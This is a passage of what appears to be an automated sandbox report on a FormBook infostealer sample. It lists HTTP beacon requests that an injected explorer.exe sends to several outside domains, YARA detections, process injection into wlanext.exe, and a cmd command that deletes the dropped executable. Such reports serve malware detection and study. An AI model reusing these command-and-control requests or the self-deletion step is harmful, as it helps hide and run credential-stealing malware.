                                                                        3 | 192.168.2.4 | 49743 | 64.32.22.102 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:10.974932909 CEST | 5712 | OUT | GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1
                                                                        Host: www.serversexposed.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:11.139461040 CEST | 5713 | IN | HTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 08:49:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Location: http://www.serversexposed.com?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        4 | 192.168.2.4 | 49755 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:16.207128048 CEST | 6552 | OUT | GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.heliumhubs.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:16.320554018 CEST | 6564 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 08:49:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe3b-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        5 | 192.168.2.4 | 49758 | 64.190.62.111 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:21.406011105 CEST | 6616 | OUT | GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1
                                                                        Host: www.420vaca.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:21.577060938 CEST | 6618 | IN | HTTP/1.1 200 OK
                                                                        date: Thu, 08 Apr 2021 08:49:21 GMT
                                                                        content-type: text/html; charset=UTF-8
                                                                        transfer-encoding: chunked
                                                                        vary: Accept-Encoding
                                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        pragma: no-cache
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg==
                                                                        last-modified: Thu, 08 Apr 2021 08:49:21 GMT
                                                                        x-cache-miss-from: parking-6dfcfcdcd9-bqj82
                                                                        server: NginX
                                                                        connection: close
                                                                        Data Raw: 32 44 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 66 74 65 43 75 4e 37 7a 69 66 6a 77 37 59 6d 71 44 48 79 61 30 44 51 6b 74 4a 75 7a 72 33 2b 36 53 47 78 54 34 6f 33 4c 36 43 53 77 2f 48 2f 58 47 6b 76 67 6a 68 52 48 73 43 72 74 75 55 43 2b 30 4f 62 76 6d 42 46 38 2f 49 62 2b 67 77 67 70 73 46 76 59 6c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 32 30 76 61 63 61 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 77 65 65 64 20 66 72 69 65 6e 64 6c 79 20 74 72 61 76 65 6c 20 34 32 30 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 20 34 32 30 76 61 63 61 2e 63 6f 6d 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 
6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e
                                                                        Data Ascii: 2DE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg==><head><meta charset="utf-8"><title>420vaca.com&nbsp;-&nbspDiese Website steht zum Verkauf!&nbsp;-&nbspInformationen zum Thema weed friendly travel 420.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Diese Website steht zum Verkauf! 420vaca.com ist die beste Quelle für alle Informationen die Sie suchen. Von allgemeinen Themen


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        6 | 192.168.2.4 | 49759 | 185.230.60.177 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:26.760282993 CEST | 6636 | OUT | GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.shujahumayun.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:26.951628923 CEST | 6638 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 08:49:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-wix-request-id: 1617871766.8235547367513413022
                                                                        vary: Accept-Encoding
                                                                        Age: 0
                                                                        X-Seen-By: 6ivkWfREES4Y8b2pOpzk7Owfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVivd4o9HMoDTVPhK7/s60Jl,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHV0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRaljV3HpR8xZqSNZ1HRmu/MT7fb/McGpTYWlzKPcjCkEy/J+IxyhklpGfG6pTJrtUSeA==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,8Jozq2XDr5/0Pv3E0yMnd9NvNe0e540rcGIosj5ItuEaWyug/ZdHQ36uOAkr89T0,SN48OXVfD7mFj9SdiKQMqTAOhpQfuQfXExzNxffpiV1/AD/ma+Nc5exnexQxgiaz
                                                                        Server: Pepyaka/1.15.10
                                                                        Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63
                                                                        Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.c


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        7 | 192.168.2.4 | 49765 | 91.195.240.94 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:32.039463043 CEST | 6691 | OUT | GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1
                                                                        Host: www.dottproject.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:32.075167894 CEST | 6692 | IN | HTTP/1.1 301 Moved Permanently
                                                                        content-type: text/html; charset=utf-8
                                                                        location: https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4
                                                                        date: Thu, 08 Apr 2021 08:49:32 GMT
                                                                        content-length: 170
                                                                        connection: close
                                                                        Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 74 74 70 72 6f 6a 65 63 74 2e 63 6f 6d 2f 61 71 75 32 2f 3f 45 68 55 74 76 78 3d 78 64 46 74 33 78 41 48 6e 58 69 54 50 4c 33 70 26 61 6d 70 3b 6d 62 79 44 3d 38 71 50 77 65 47 30 4f 6d 37 67 6e 66 78 63 74 4b 39 38 46 2f 30 64 73 6f 4c 30 6c 76 5a 75 48 34 64 30 7a 4a 2f 41 4b 6d 52 50 4d 46 35 4b 50 68 41 44 78 5a 41 6c 43 71 6d 6a 6d 6d 4b 50 35 2f 41 4f 34 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                        Data Ascii: <a href="https://www.dottproject.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&amp;mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4">Moved Permanently</a>.


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        8 | 192.168.2.4 | 49767 | 104.128.125.95 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:37.615808010 CEST | 6736 | OUT | GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.qcmax.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:38.058896065 CEST | 6736 | OUT | GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.qcmax.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:38.221250057 CEST | 6738 | IN | HTTP/1.1 200 OK
                                                                        Server: Tengine
                                                                        Date: Thu, 08 Apr 2021 08:49:38 GMT
                                                                        Content-Type: text/html;charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                                        9          | 192.168.2.4 | 49768       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 10:49:43.196348906 CEST | 6739 | OUT | GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1
                                                                        Host: www.playfulpainters.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:43.311574936 CEST | 6739 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 08:49:43 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "605e0138-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        Behavior


                                                                        System Behavior

                                                                        General

                                                                        Start time:10:48:04
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206065 bytes
                                                                        MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:48:05
                                                                        Start date:08/04/2021
                                                                        Path:C:\Users\user\Desktop\eQLPRPErea.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x400000
                                                                        File size:206065 bytes
                                                                        MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:48:10
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:48:22
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\wlanext.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                        Imagebase:0xea0000
                                                                        File size:78848 bytes
                                                                        MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:48:26
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:/c del 'C:\Users\user\Desktop\eQLPRPErea.exe'
                                                                        Imagebase:0x11d0000
                                                                        File size:232960 bytes
                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:48:26
                                                                        Start date:08/04/2021
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff724c50000
                                                                        File size:625664 bytes
                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        Disassembly

                                                                        Code Analysis
